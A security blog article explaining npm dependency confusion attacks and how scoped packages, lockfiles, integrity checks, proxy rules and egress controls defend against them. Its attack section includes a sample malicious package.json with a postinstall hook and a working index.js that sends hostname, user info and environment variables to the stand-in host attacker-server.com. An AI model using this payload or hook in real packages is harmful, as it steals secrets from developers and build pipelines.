Dependency Confusion: The Supply Chain Attack in Your package.json

The modern software development landscape is built upon a foundation of open-source packages. Package ecosystems like npm, PyPI, and RubyGems have accelerated development cycles, allowing teams to leverage a global supply of pre-built components. However, this reliance on external dependencies has turned the software supply chain itself into a new and insidious attack vector.

One of the most critical and subtle vulnerabilities to emerge in this domain is Dependency Confusion. This attack exploits the ambiguous way package managers resolve dependencies, tricking build systems into downloading and executing malicious code from a public repository instead of a trusted, internal one. This article provides a deep dive into the mechanics of dependency confusion, its potential impact, and, most importantly, the practical steps you can take to secure your package.json and protect your organization.

What is Dependency Confusion?

At its core, dependency confusion, also known as a namespace confusion attack, is a supply chain attack that targets the resolution logic of package manager clients. It affects projects that depend on an internal package whose name is not reserved on a public registry (like npmjs.com). The attack is executed when an adversary publishes a package with that exact name to the public registry, typically with a higher version number than the internal one.

Think of it like ordering a specific part for a custom-built machine. Your company, “InnovateCorp,” manufactures a proprietary component called innovate-api-client and stores it in your private warehouse (your internal package registry). Your assembly instructions (package.json) simply say, “get innovate-api-client.” An external supplier, hearing about this part, decides to create a counterfeit version, also labels it innovate-api-client, and lists it in a global public catalog (the public npm registry) with a label that says “Version 2.0,” while your internal one is “Version 1.5.”

When your automated assembly robot (the package manager) is tasked with fetching the part, it scans both the private warehouse and the public catalog. Seeing that the public catalog offers a “newer” version (2.0 > 1.5), it prioritizes the latest available option, unwittingly installing the counterfeit, potentially booby-trapped component into your machine.

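This is precisely how dependency confusion works. When a package manager, or a registry proxy in front of it, is configured to draw the same package name from several sources, it often picks the highest version that satisfies the declared range, regardless of which source offers it. pip’s --extra-index-url option behaves this way, as do repository managers that merge an internal repository with a public mirror behind one URL. The package manager becomes “confused” about which package to trust, and the attacker exploits this ambiguity to achieve remote code execution (RCE) on a developer’s machine or, more devastatingly, within a continuous integration/continuous deployment (CI/CD) pipeline.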

The vulnerability was first brought to mainstream attention by security researcher Alex Birsan in a 2021 blog post, where he demonstrated successful breaches against major tech companies, including Apple, Microsoft, and Tesla, earning over $130,000 in bug bounties.

Anatomy of an Attack

The execution of a dependency confusion attack is alarmingly straightforward and can be broken down into a few key steps. The simplicity of the attack is what makes it so dangerous and scalable.

Reconnaissance: Finding Private Package Names

The first step for an attacker is to identify the names of internal, private packages used by a target organization. This is often the most challenging part, but there are numerous ways to leak this information. Attackers can scan public code repositories (like GitHub) for files such as package.json, which may have been accidentally committed. They can also scrape JavaScript files hosted on the company’s public websites, as these often contain require('internal-package-name') statements. Even internal network configurations or DNS logs can sometimes expose these names.
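Defenders can run the same kind of search against their own public assets. The following is a minimal sketch in JavaScript that assumes the bundle text is already loaded as a string. `findRequiredPackages` is a hypothetical helper, and it only sees literal `require()` calls, so bundles whose loaders replace module names with numeric IDs will slip past it. Any name it reports that exists only on your private registry is one an attacker could find the same way.

```javascript
// Hypothetical self-audit: list the package names that a built JavaScript
// bundle still mentions in literal require('...') calls.
function findRequiredPackages(bundleSource) {
  // Matches require('x') or require("x") with a string-literal argument.
  const pattern = /require\(\s*['"]([^'"]+)['"]\s*\)/g;
  const names = new Set();
  for (const match of bundleSource.matchAll(pattern)) {
    const specifier = match[1];
    // Skip relative and absolute file paths; keep only package names.
    if (specifier.startsWith('.') || specifier.startsWith('/')) continue;
    // Reduce deep imports ('pkg/sub', '@scope/pkg/sub') to the package name.
    const parts = specifier.split('/');
    const pkg = specifier.startsWith('@') ? parts.slice(0, 2).join('/') : parts[0];
    names.add(pkg);
  }
  return [...names].sort();
}

const sample = "const a=require('corp-logger');const b=require(\"./util\");" +
  "const c=require('@my-company/auth/client');const d=require('react');";
console.log(findRequiredPackages(sample));
// [ '@my-company/auth', 'corp-logger', 'react' ]
```

The output still needs to be compared against your internal package inventory, since public packages and Node built-ins appear in the same list.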

Creation of the Malicious Package

Once a list of potential internal package names is compiled (e.g., acme-auth-client, corp-logger, internal-api-helper), the attacker creates a malicious package for each name. The code within these packages is designed to execute upon installation. A common technique is to use the postinstall script in the package.json file. This script automatically runs after the package is installed.

A malicious package.json might look like this:

{
  "name": "acme-auth-client",
  "version": "99.99.99",
  "description": "A malicious package for dependency confusion attack.",
  "main": "index.js",
  "scripts": {
    "postinstall": "node index.js"
  },
  "author": "Attacker",
  "license": "ISC"
}
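When reviewing a dependency, or investigating a suspicious one, it is worth checking which of these install-time hooks it declares. The following minimal sketch assumes the manifest has already been parsed into an object. `installScripts` is a hypothetical helper that checks only the three hooks npm runs when installing a package from a registry. npm’s `--ignore-scripts` option stops such hooks from running at all, at the cost of breaking packages that genuinely need a build step.

```javascript
// Lifecycle hooks npm runs automatically when it installs a package
// from a registry tarball.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Return the install-time scripts declared in a parsed package.json object.
function installScripts(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

const suspicious = {
  name: 'acme-auth-client',
  version: '99.99.99',
  scripts: { postinstall: 'node index.js', test: 'echo ok' },
};
console.log(installScripts(suspicious));
```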

The Payload (index.js)

The index.js file contains the malicious payload. This could be anything, but a common proof-of-concept is to exfiltrate environment variables, which can contain sensitive secrets like API keys, database credentials, or internal network details. A simple exfiltration script might gather the machine’s hostname, the current user’s account details, and the environment variables, then send them to an attacker-controlled server in an HTTP request.

// Malicious index.js
const os = require('os');
const http = require('http');

try {
  const data = JSON.stringify({
    hostname: os.hostname(),
    userInfo: os.userInfo(),
    env: process.env
  });

  const options = {
    hostname: 'attacker-server.com',
    port: 80,
    path: '/log',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': Buffer.byteLength(data) // byte count, not string length
    }
  };

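  const req = http.request(options);
  // Network errors are emitted asynchronously, so the surrounding try/catch
  // cannot catch them; this listener keeps a failed request from crashing the install.
  req.on('error', () => {});
  req.write(data);
  req.end();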
} catch (e) {
  // Fail silently
}

Publishing to a Public Registry

The attacker publishes this malicious package to the public npm registry. Crucially, they assign it a very high version number, like 99.99.99, to ensure it will almost certainly be higher than any internal version.

The Waiting Game

The attacker now waits. The next time a developer sets up a new environment or a CI/CD pipeline runs a clean build (npm install or yarn), the package manager will query its configured registries. If the client, or a registry proxy in front of it, draws on both the public and private registries, it will see acme-auth-client@1.2.3 in the private registry and acme-auth-client@99.99.99 in the public one. Provided the project’s declared version range admits 99.99.99 (for example, * or >=1.0.0), it will select the latter, download it, and execute the postinstall script, triggering the payload. The attack is complete.

How Package Managers Get Tricked: The Resolution Logic

The success of a dependency confusion attack hinges entirely on the default dependency resolution behavior of package managers. Tools like npm, Yarn, and pip (for Python) are designed for developer convenience, and part of that convenience is automatically finding the “best” version of a dependency.

By default, npm itself sends every request for a given package name to exactly one registry: the one mapped to the package’s scope, or the default registry for unscoped names. The risk appears when that single endpoint, or the client itself, merges several sources. A repository manager that exposes an internal repository and a public npm mirror behind one URL, or pip run with --extra-index-url, will look for an unscoped name in every source. When it finds the package in multiple locations, the decision usually comes down to the version number, on the assumption that a higher version represents a more recent and desirable release.
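The merge-and-take-highest behavior can be modeled in a few lines. This is a simplified sketch, not any real client’s algorithm. The `sources` array, `resolveHighest`, and `compareVersions` are hypothetical, versions are plain MAJOR.MINOR.PATCH strings, and declared version ranges are ignored.

```javascript
// Simplified comparison for plain MAJOR.MINOR.PATCH strings
// (no pre-release tags or build metadata).
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

// Naive resolution: merge the versions offered by every source and take the
// highest, with no regard for which source a name is supposed to come from.
function resolveHighest(name, sources) {
  let best = null;
  for (const source of sources) {
    for (const version of source.packages[name] || []) {
      if (!best || compareVersions(version, best.version) > 0) {
        best = { version, from: source.url };
      }
    }
  }
  return best;
}

const sources = [
  { url: 'https://npm.my-company.com/', packages: { 'acme-auth-client': ['1.2.2', '1.2.3'] } },
  { url: 'https://registry.npmjs.org/', packages: { 'acme-auth-client': ['99.99.99'] } },
];
console.log(resolveHighest('acme-auth-client', sources));
// { version: '99.99.99', from: 'https://registry.npmjs.org/' }
```

Nothing in `resolveHighest` knows that acme-auth-client is supposed to be internal, and that missing piece of information is exactly what the attacker relies on.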

Consider a typical package.json entry:

"dependencies": {
  "internal-api-helper": "^1.4.0"
}

And a configuration file (.npmrc) that points to both a private and a public registry:

# .npmrc
@my-company:registry=https://npm.my-company.com/
registry=https://registry.npmjs.org/

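In this configuration, any package scoped with @my-company is fetched from the private registry. The unscoped internal-api-helper matches no scope rule, however, so npm requests it from the default registry, registry.npmjs.org, where anyone can publish that name. The same exposure exists when the default registry is an internal proxy that merges private and public packages. If the private registry holds internal-api-helper@1.4.5 and an attacker publishes internal-api-helper@1.99.0 publicly, the public version wins: it satisfies the ^1.4.0 range (>=1.4.0 <2.0.0) and is the higher version. Note that 99.99.99 would not satisfy a caret range pinned to major version 1, so attackers either publish a high minor or patch version within the expected major version or rely on permissive ranges such as * or >=1.0.0. The build system has been successfully confused.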
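The caret arithmetic can be checked directly. npm delegates range matching to the `semver` package (for example, `semver.satisfies`). The hand-rolled `satisfiesCaret` below is only an illustrative stand-in that understands `^x.y.z` ranges on plain versions.

```javascript
// Minimal caret-range check for plain MAJOR.MINOR.PATCH versions.
// This sketch skips pre-release tags, build metadata, and every
// range form except ^x.y.z.
const parse = (v) => v.split('.').map(Number);

function compare(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] - b[i];
  }
  return 0;
}

// ^1.4.0 allows >=1.4.0 <2.0.0; ^0.4.0 allows >=0.4.0 <0.5.0; ^0.0.4 allows only 0.0.4.
function caretUpperBound([major, minor, patch]) {
  if (major > 0) return [major + 1, 0, 0];
  if (minor > 0) return [0, minor + 1, 0];
  return [0, 0, patch + 1];
}

function satisfiesCaret(version, range) {
  const base = parse(range.replace(/^\^/, ''));
  const v = parse(version);
  return compare(v, base) >= 0 && compare(v, caretUpperBound(base)) < 0;
}

for (const candidate of ['1.4.5', '1.99.0', '2.0.0', '99.99.99']) {
  console.log(candidate, satisfiesCaret(candidate, '^1.4.0'));
}
// 1.4.5 true
// 1.99.0 true
// 2.0.0 false
// 99.99.99 false
```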

Mitigation Strategies: Securing Your Supply Chain

While dependency confusion is a serious threat, it is also a solvable problem. Protecting your organization requires a multi-layered approach focused on removing ambiguity from your dependency resolution process.

1. Use Scoped Packages (The Primary Defense)

The most effective and robust defense against dependency confusion is to use scoped packages for all internal projects. Scopes are a feature of npm that provides a namespace for your packages. A scoped package name starts with an @ symbol, followed by the organization’s name, and then a slash (e.g., @my-company/internal-api-helper).

How it works: An unscoped package like internal-api-helper lives in the public namespace, so anyone can attempt to publish it. A scoped package like @my-company/internal-api-helper belongs to the my-company namespace, and on the public npm registry only members of the organization (or the user) that owns that scope can publish under it. Register your scope on npmjs.com even if you never publish there, so that no one else can claim it. Combined with a registry mapping for the scope, this removes the ambiguity that dependency confusion relies on.
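Before migrating, it helps to know which dependencies still use unscoped internal names. The following minimal sketch assumes you keep a list of the names hosted on your private registry. `internalNames` and `unscopedInternalDeps` are hypothetical.

```javascript
// Hypothetical inventory of names your private registry hosts.
const internalNames = new Set(['internal-api-helper', 'corp-logger', '@my-company/auth']);

// List dependencies that are internal but not under the given scope,
// i.e. names an outsider could still claim on the public registry.
function unscopedInternalDeps(manifest, scope, internal) {
  const sections = ['dependencies', 'devDependencies', 'optionalDependencies', 'peerDependencies'];
  const exposed = [];
  for (const section of sections) {
    for (const name of Object.keys(manifest[section] || {})) {
      if (internal.has(name) && !name.startsWith(`${scope}/`)) {
        exposed.push(`${section}: ${name}`);
      }
    }
  }
  return exposed;
}

const manifest = {
  dependencies: { 'internal-api-helper': '^1.4.0', '@my-company/auth': '^2.0.0', react: '^18.2.0' },
  devDependencies: { 'corp-logger': '^3.1.0' },
};
console.log(unscopedInternalDeps(manifest, '@my-company', internalNames));
```

Here internal-api-helper and corp-logger are reported, while @my-company/auth (already scoped) and react (not internal) are not.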

Implementation: To implement this, you need to configure your .npmrc file to associate your scope with your private registry.

# .npmrc
@my-company:registry=https://npm.my-company.com/
# Always use the official public registry for all other packages
registry=https://registry.npmjs.org/

With this configuration, npm sends requests for any package starting with @my-company/ only to your private registry, which eliminates the confusion on every machine and pipeline that uses this .npmrc.
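The reason this works is easier to see in a model of the routing: npm picks exactly one registry per package name before any version comparison happens. The sketch below is a deliberately simplified model of that lookup. `parseNpmrc` and `registryFor` are hypothetical helpers. Real npm configuration also merges project, user, and global .npmrc files and supports environment-variable expansion and auth settings.

```javascript
// Simplified model of how npm routes a package name to a registry using
// `@scope:registry=` and `registry=` lines from a single .npmrc.
function parseNpmrc(text) {
  const config = { scopes: {}, registry: 'https://registry.npmjs.org/' };
  for (const raw of text.split('\n')) {
    const line = raw.trim();
    // Skip blank lines and comments.
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq === -1) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    const scoped = key.match(/^(@[^:]+):registry$/);
    if (scoped) config.scopes[scoped[1]] = value;
    else if (key === 'registry') config.registry = value;
  }
  return config;
}

// A scoped name uses its scope's registry if one is mapped; everything else
// goes to the default registry. Exactly one registry is consulted.
function registryFor(packageName, config) {
  if (packageName.startsWith('@')) {
    const scope = packageName.split('/')[0];
    if (config.scopes[scope]) return config.scopes[scope];
  }
  return config.registry;
}

const npmrc = [
  '# .npmrc',
  '@my-company:registry=https://npm.my-company.com/',
  'registry=https://registry.npmjs.org/',
].join('\n');
const config = parseNpmrc(npmrc);
console.log(registryFor('@my-company/internal-api-helper', config)); // https://npm.my-company.com/
console.log(registryFor('internal-api-helper', config));            // https://registry.npmjs.org/
```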

2. Version Pinning and Lockfiles

Using lockfiles (package-lock.json for npm, yarn.lock for Yarn) is a crucial best practice for ensuring deterministic and repeatable builds. A lockfile “locks” the dependency tree to the specific versions and locations of packages that were used in a successful build.

How it works: When you run npm install, a package-lock.json file is generated. This file contains the exact version of every package installed, its resolved location (URL), and a cryptographic hash of its contents (an integrity checksum).

// Snippet from package-lock.json
"internal-api-helper": {
  "version": "1.4.5",
  "resolved": "https://npm.my-company.com/internal-api-helper/-/internal-api-helper-1.4.5.tgz",
  "integrity": "sha512-..."
}

On subsequent installs (such as in a CI/CD pipeline), use npm ci instead of npm install. The npm ci command performs a clean install from the lockfile: it removes any existing node_modules directory, installs exactly the recorded versions from their resolved URLs, verifies each integrity hash, and exits with an error if package.json and the lockfile disagree rather than updating the lockfile. If a dependency confusion attack caused the public package to be installed during the initial npm install, the lockfile would unfortunately record that malicious package. However, once a correct lockfile is generated and committed, it prevents a future build from being tricked into downloading a newer, malicious public version.
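A lockfile only protects you if it records the right sources, so it can be worth reviewing lockfile changes in CI before npm ci runs. The following minimal sketch assumes lockfileVersion 2 or 3, where entries sit under `packages` keyed by their node_modules path, and a hypothetical list of internal names. `auditLockfile` flags any internal name whose `resolved` URL does not point at the private registry, including entries that have no `resolved` field at all.

```javascript
// Flag lockfile entries for internal package names whose tarball does not
// come from the private registry (lockfileVersion 2 or 3 layout).
function auditLockfile(lock, internalNames, privateRegistry) {
  const marker = 'node_modules/';
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project itself
    // The package name is whatever follows the last node_modules/ segment.
    const name = path.slice(path.lastIndexOf(marker) + marker.length);
    if (!internalNames.has(name)) continue;
    if (!entry.resolved || !entry.resolved.startsWith(privateRegistry)) {
      findings.push({ name, version: entry.version, resolved: entry.resolved || null });
    }
  }
  return findings;
}

const lock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-app' },
    'node_modules/internal-api-helper': {
      version: '1.99.0',
      resolved: 'https://registry.npmjs.org/internal-api-helper/-/internal-api-helper-1.99.0.tgz',
      integrity: 'sha512-...',
    },
    'node_modules/corp-logger': {
      version: '3.1.0',
      resolved: 'https://npm.my-company.com/corp-logger/-/corp-logger-3.1.0.tgz',
      integrity: 'sha512-...',
    },
  },
};
console.log(auditLockfile(lock, new Set(['internal-api-helper', 'corp-logger']), 'https://npm.my-company.com/'));
```

In this example only internal-api-helper is reported, because its tarball was resolved from the public registry.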

Limitation: Version pinning is a powerful control but not a complete solution on its own. It does not protect the initial installation. If a developer’s machine is misconfigured or a package-lock.json is not present during the first install, the project is still vulnerable.

3. Verifying Package Integrity

The integrity field within a lockfile is a subresource integrity (SRI) hash. It acts as a digital fingerprint for the package tarball. When the package manager downloads a dependency, it calculates its hash and compares it against the value in the lockfile. If they do not match, the installation will fail. This provides strong protection against a package being tampered with in transit or a different package being served from the same URL, but it relies on the lockfile being correct in the first place.
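An integrity string consists of the hash algorithm name, a hyphen, and the base64-encoded digest of the tarball. The sketch below uses Node’s built-in crypto module with stand-in bytes instead of a real tarball. `sriFor` and `matchesIntegrity` are hypothetical helpers that handle a single sha512 entry. npm’s own implementation (the ssri package) also supports multiple hashes and algorithms.

```javascript
const crypto = require('crypto');

// Compute an SRI string in the "sha512-<base64 digest>" form npm writes to
// the lockfile's integrity field.
function sriFor(tarballBytes) {
  const digest = crypto.createHash('sha512').update(tarballBytes).digest('base64');
  return `sha512-${digest}`;
}

// Compare downloaded bytes against the integrity string recorded earlier.
function matchesIntegrity(tarballBytes, expected) {
  return sriFor(tarballBytes) === expected;
}

const original = Buffer.from('pretend this is internal-api-helper-1.4.5.tgz');
const recorded = sriFor(original);
console.log(matchesIntegrity(original, recorded));                          // true
console.log(matchesIntegrity(Buffer.from('a different tarball'), recorded)); // false
```

The check can only tell you that the bytes match what was recorded. If the recorded hash belongs to the attacker’s tarball, it will match that tarball just as faithfully.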

4. Explicit Registry Configuration

For environments where unscoped internal packages are a legacy reality and cannot be migrated immediately, you must be explicit about where the package manager should look for them. While less robust than using scopes, you can route all package traffic through a single internal proxy and configure it so that internal names are served only from the private repository, never from the public mirror. However, this can be complex to maintain and may have unintended side effects, such as blocking a legitimate public package that happens to share a name with an internal one. The recommended approach remains migrating to scoped packages.
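The difference from merge-and-take-highest resolution comes down to a single rule: an internal name never falls through to the public source. The sketch below models that rule generically. `pickSource` and the two in-memory indexes are hypothetical, and real repository managers typically express the same idea through their own include/exclude or routing settings.

```javascript
// Hypothetical proxy rule: names on the internal list are served only from
// the private repository; every other name may come from the public mirror.
function pickSource(name, internalNames, privateIndex, publicIndex) {
  if (internalNames.has(name)) {
    // Never fall through to the public mirror for an internal name,
    // even if the private repository does not have it.
    return privateIndex[name] ? { from: 'private', versions: privateIndex[name] } : null;
  }
  return publicIndex[name] ? { from: 'public', versions: publicIndex[name] } : null;
}

const internalNames = new Set(['internal-api-helper']);
const privateIndex = { 'internal-api-helper': ['1.4.5'] };
const publicIndex = { 'internal-api-helper': ['1.99.0'], react: ['18.2.0'] };

console.log(pickSource('internal-api-helper', internalNames, privateIndex, publicIndex));
// { from: 'private', versions: [ '1.4.5' ] }
console.log(pickSource('react', internalNames, privateIndex, publicIndex));
// { from: 'public', versions: [ '18.2.0' ] }
```

Returning `null` for a missing internal name is deliberate, because a failed build is far cheaper than a silently substituted package.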

5. Network Controls and Auditing

As a final layer of defense, especially for critical build servers, network controls can be implemented.

Firewall Rules: Configure egress firewall rules to block build servers from making outbound requests to public registries like registry.npmjs.org. All dependencies, including public ones, should be fetched from a private registry that acts as a secure proxy or mirror.

Dependency Auditing: Regularly use tools like npm audit and commercial Software Composition Analysis (SCA) solutions. These tools can scan your dependencies for known vulnerabilities and, in some cases, detect suspicious packages or dependency resolution patterns.

Conclusion: A Proactive Stance on Supply Chain Security

Dependency confusion is a stark reminder that our software supply chains are a prime target for attackers. The attack’s elegance lies in its simplicity and its exploitation of default, convenience-oriented behaviors in the tools we use every day. It transforms a project’s package.json from a simple list of dependencies into a potential entry point for malicious code.

However, the threat is entirely manageable. The solution is not to abandon the open-source ecosystem but to adopt a more deliberate and security-conscious approach to dependency management. By embracing scoped packages as a primary defense, enforcing the use of lockfiles, and implementing robust registry configurations, organizations can effectively eliminate this vector of attack.

Securing the software supply chain is no longer a peripheral task; it is a central pillar of modern application security. The time to review your dependencies and fortify your build processes is now, before your package manager’s confusion becomes your organization’s security incident.

InstaTunnel